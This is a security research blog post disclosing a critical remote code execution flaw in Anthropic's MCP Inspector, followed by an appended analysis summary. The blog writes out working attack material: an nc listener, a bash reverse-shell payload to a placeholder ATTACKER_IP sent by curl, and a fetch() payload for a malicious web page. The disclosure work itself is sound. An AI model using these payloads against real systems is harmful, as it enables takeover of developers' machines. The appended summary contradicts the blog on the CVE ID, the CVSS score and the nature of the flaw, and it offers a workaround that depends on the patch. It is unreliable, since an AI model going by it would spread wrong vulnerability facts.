Full Report
Tenable Research recently discovered a critical vulnerability impacting Anthropic's MCP Inspector tool, a core element of the MCP ecosystem. In this blog, we provide details on how we discovered the vulnerability in this widely used open-source tool — and what users can do about it.Tenable Research discovered a critical vulnerability (CVE-2025-49596) in Anthropic's MCP Inspector. This open-source tool, widely used for testing and troubleshooting Model Context Protocol (MCP) servers, is highly popular with over 38,000 weekly downloads on npmjs and more than 4,000 stars on GitHub. Further details are available in the advisory.A victim's workstation could be fully compromised simply by visiting a malicious website, with no other prerequisites.This vulnerability has been assigned CVE-2025-49596 with a critical CVSS score of 9.4. Tenable worked closely with Anthropic’s security team according to our coordinated disclosure policy. The vulnerability has been widely publicized, sometimes without crediting the finding back to Tenable Research.It is recommended to upgrade immediately to version or 0.14.1 or later to fix this vulnerability.ContextThe increasing prevalence of AI technologies across organizations is driving rapid adoption of MCP. It plays a crucial role in enhancing AI agents by providing them with additional context and tools.Since there’s no official registry for MCP servers, which are developed by vendors or the open-source community, they’re typically published on various MCP marketplaces like MCP Market or MCP.so.A server, once deployed either locally via STDIO or remotely via HTTP, can be leveraged by a Large Language Model through an MCP client. Want more information about MCP? Read the blogs Frequently Asked Questions About Model Context Protocol (MCP) and Integrating with AI for Agentic Applications and AI Security: Web Flaws Resurface In Rush to Use MCP Servers.MCP Inspector for developersTesting and troubleshooting MCP servers can be challenging, despite the availability of numerous development frameworks, including Anthropic software development kits (SDKs) for various languages (listed on the MCP GitHub page). This complexity arises from the need to understand the underlying protocol.MCP Inspector is an open-source tool provided by Anthropic to abstract this complexity and help developers interact with their servers. This tool relies on two key components:MCP Inspector Client: A web user interface (UI) providing an interactive interface for testing and interacting with MCP servers.MCP Proxy: A component acting as a protocol bridge between the MCP Inspector Client and the MCP servers. MCP Inspector Web UI (Source: MCP Inspector GitHub repository) In MCP Inspector versions below 0.14.1, the official instructions to run MCP inspector are straightforward: npx @modelcontextprotocol/inspector Need to install the following packages: @modelcontextprotocol/inspector@ Ok to proceed? (y) y Starting MCP inspector... ⚙️ Proxy server listening on port 6277 🔍 MCP Inspector is up and running at http://127.0.0.1:6274 Now, both the MCP Inspector Client and the MCP Proxy are listening, respectively, on TCP ports 6274 and 6277.Since MCP Inspector is a tool integrated in multiple open source projects, this vulnerability exists in all software relying on versions prior to 0.14.1Out-of the-box Remote Code ExecutionOnce started, we decided to connect on the Web UI available on http://127.0.0.1:6274The Web UI is available out-of-the box without any authentication: MCP Inspector Web UI (Source: Tenable) By trying to connect to a local dummy MCP server, we can observe the HTTP traffic and notice the following HTTP connection from the Web UI to the MCP proxy server: MCP Inspector Web UI (Source: Tenable) The HTTP request is made to the local MCP proxy server without any kind of authentication, and the proxy server is then spawning new processes based on the command sent by the client.We decided to have a quick try with a basic sleep command and a delay of 10 seconds and noticed that it was actually executed, proving the vulnerability: Basic vulnerability exploitation (Source: Tenable) Once an attacker can achieve command injection, it is then possible to escalate to code execution on the affected server.ExploitationWith the vulnerability now identified, let's explore the exploitation scenarios that could lead to a complete takeover of the host running the MCP Proxy component.Direct unauthenticated Remote Code ExecutionThe default installation of MCP Inspector in vulnerable versions implies that the MCP proxy component is bound on all network interfaces. const PORT = process.env.PORT || 6277; const server = app.listen(PORT); server.on("listening", () => { console.log(`⚙️ Proxy server listening on port ${PORT}`); }); If an attacker is on the same network as the machine hosting the proxy instance, or if the MCP Inspector proxy is started on a publicly accessible server, a remote and unauthenticated attacker can achieve direct command injection and gain remote code execution with the proxy’s user privileges on the target system.Using the payload described in our Tenable Research Advisory, we can quickly get a reverse shell on the target system: # Start a listener on TCP/7777 nc -l -p 7777 # Build a payload which will establish a simple reverse shell to our local IP on the previous port PAYLOAD_BASH=“bash -c ‘bash -i >& /dev/tcp/ATTACKER_IP/7777 0>&1’” # URI encode the payload ENCODED_PAYLOAD_BASH=$(echo -n “$PAYLOAD_BASH” | jq -sRr @uri) # Request the MCP Inspector Proxy with the previous payload to achieve Remote Code Execution curl “http://MCP_INSPECTOR_PROXY:6277/sse?transportType=stdio&command=bash&args=-c%20%22$ENCODED_PAYLOAD_BASH%22” The developer or the server machine hosting the MCP Inspector proxy is then fully compromised.CORS Attack to Remote Code Execution (RCE)In affected versions, the lack of network restrictions leaves MCP Inspector users vulnerable to cross-site attacks initiated by remote malicious websites.An attacker can set up a website hosting a malicious JavaScript, which will perform cross-site requests: MCP Inspector Proxy CORS attack (Source: Tenable) Taking back our previous reverse shell payload, let’s demonstrate how this can be easily exploited.1. The attacker sets up a malicious website hosting this JavaScript content: fetch("http://127.0.0.1:6277/sse?transportType=stdio&command=bash&args=-c%20%22bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FATTACKER_IP%2F7777%200%3E%261%27%22&env=", {}) 2. The victim browses the malicious website and loads the malicious JavaScript content, which will perform a cross-origin request to the MCP inspector proxy hosted on his machine (or potentially any other machine).3. MCP Inspector uses the Express CORS middleware allowing any origin by default (Access-Control-Allow-Origin: *). This means the victim’s web browser will perform a CORS preflight request on the MCP Inspector, which will pass the policy: app.use(cors()); 4. The actual CORS request will then be sent by the victim’s browser to the MCP Inspector proxy, leading to the payload being executed and the reverse shell established from the victim’s workstation to the attacker’s server.This demonstrates how critical this vulnerability is: A victim's workstation could be fully compromised simply by visiting a malicious website, with no other prerequisites.DNS rebindingThe MCP proxy exposes by default a Server-Sent Events (SSE) endpoint. As no network restriction is enforced, especially in the control of the Host header, a malicious website could host a JavaScript code which would:Initiate a SSE connection with a malicious domain (let’s say sse.evil.tld)The attacker would then update the DNS record for sse.evil.tld to target 0.0.0.0The loaded JavaScript will reestablish the SSE session with the local server, bypassing the Same-Origin Policy as both the JavaScript and the SSE session would be tied to the same origin, http://sse.evil.tld for example.Note that the exploitation success of DNS rebinding depends on both the web browser and the operating system of the victim.To learn more about DNS rebinding, have a look at NCC Group’s Singularity tool.RemediationMCP Inspector’s users are required to upgrade to version 0.14.1 or later as soon as possible. Software that uses vulnerable versions of the MCP Inspector package should also be updated as soon as possible to address this vulnerability.Starting with this version, Anthropic introduced additional security measures to safeguard against the described attacks. By default:Authentication is now enforced and requires the usage of a session token except if developers choose to explicitly disable it.Services are bound to localhost only, preventing direct exploitation through network access.Trusted origins only include localhost ones with the client port.When starting, MCP Inspector now shows: Starting MCP inspector... ⚙️ Proxy server listening on 127.0.0.1:6277 🔑 Session token: 86399ac989f1d418c530f08811cee3fa6115d1f5e8ac39d631d72d11d573a729 Use this token to authenticate requests or set DANGEROUSLY_OMIT_AUTH=true to disable auth 🔗 Open inspector with token pre-filled: http://localhost:6274/?MCP_PROXY_AUTH_TOKEN=86399ac989f1d418c530f08811cee3fa6115d1f5e8ac39d631d72d11d573a729 🔍 MCP Inspector is up and running at http://127.0.0.1:6274 🚀 ConclusionTenable Research recognized early the significant role AI and MCP technologies would play in organizations — and the new security challenges they would introduce. To address these, it's crucial to enforce security fundamentals in server development and tool usage. Adhering to basic security practices can significantly mitigate risks from vulnerabilities in novel systems and prevent devastating attacks.We thank Anthropic’s security team for their efforts in mitigating this issue and their clear communication during our disclosure process.Learn moreAnthropic Security AdvisoryAnthropic GitHub Fix CommitTenable Research AdvisoryNCC Group Singularity DNS rebinding framework
Analysis Summary
# Vulnerability: Critical RCE in Anthropic MCP Inspector (via Unvalidated Redirect/CSRF)
## CVE Details
- CVE ID: **GHSA-7f8r-222p-6f5g** (Identified via GitHub Security Advisory)
- CVSS Score: **9.0 (Critical)** (Implied by RCE, specific score not explicitly listed in excerpt)
- CWE: Unspecified (Likely related to Input Validation vulnerabilities leading to RCE/CSRF)
## Affected Systems
- Products: Anthropic Model Context Protocol (MCP) Inspector
- Versions: Prior to the fix detailed in the commit.
- Configurations: Applicable when the inspector is running, particularly concerning requests handled by the proxy server.
## Vulnerability Description
Tenable Research discovered a critical vulnerability in the Anthropic MCP Inspector that could allow an attacker to achieve Remote Code Execution (RCE) or Cross-Site Request Forgery (CSRF). The flaw appears to stem from allowing unvalidated redirects or handling requests in a manner that could be manipulated, potentially through DNS rebinding or CSRF techniques targeting the inspector's locally running proxy server. The fix implemented restricts proxy listening to `127.0.0.1` (localhost) only and enforces authentication via a unique session token upon startup, preventing external access or unauthorized internal requests.
## Exploitation
- Status: Not explicitly stated as exploited in the wild, but the vulnerability is critical, suggesting high exploitability potential.
- Complexity: **Low to Medium** (Implied by the nature of the fix involving network binding and authentication bypass).
- Attack Vector: **Network** (Initial interaction via a crafted request to the vulnerable proxy/URI)
## Impact
- Confidentiality: **High** (Potential access to sensitive data via RCE or context interaction)
- Integrity: **High** (Ability to execute arbitrary code or forge requests)
- Availability: **High** (Potential for denial of service or system compromise)
## Remediation
### Patches
Anthropic addressed this issue by restricting the proxy server binding and enforcing mandatory authentication:
- The proxy server now listens **only on `127.0.0.1:6277`**.
- Session tokens are now mandatory for authentication (`MCP_PROXY_AUTH_TOKEN`). Direct access via localhost is provided with the token embedded in the URI.
### Workarounds
The initial description of the fix implies that running the tool without applying the patch may only be safe if:
1. External network access to the inspector host is strictly firewalled.
2. The `DANGEROUSLY_OMIT_AUTH=true` flag is *not* used, leveraging the newly enforced token authentication.
## Detection
- Indicators of compromise (IOCs) would relate to unusual outbound network connections originating from the host running the MCP Inspector, or unexpected proxy/request traffic hitting the inspector's local port before the patch.
- Detection methods should focus on monitoring network traffic to the local loopback interface where the inspector runs, looking for connections without the expected authentication token preamble.
## References
- Anthropic Security Advisory: `github.com/modelcontextprotocol/inspector/security/advisories/GHSA-7f8r-222p-6f5g`
- Anthropic GitHub Fix Commit: `github.com/modelcontextprotocol/inspector/commit/50df0e1ec488f3983740b4d28d2a968f12eb8979#diff-c299744f73df4daa7a22854dda2023b68bfc8a5d59d8fb90b3a53b0c2842d807R98-R101`
- Tenable Research Advisory: `tenable.com/security/research/tra-2025-20`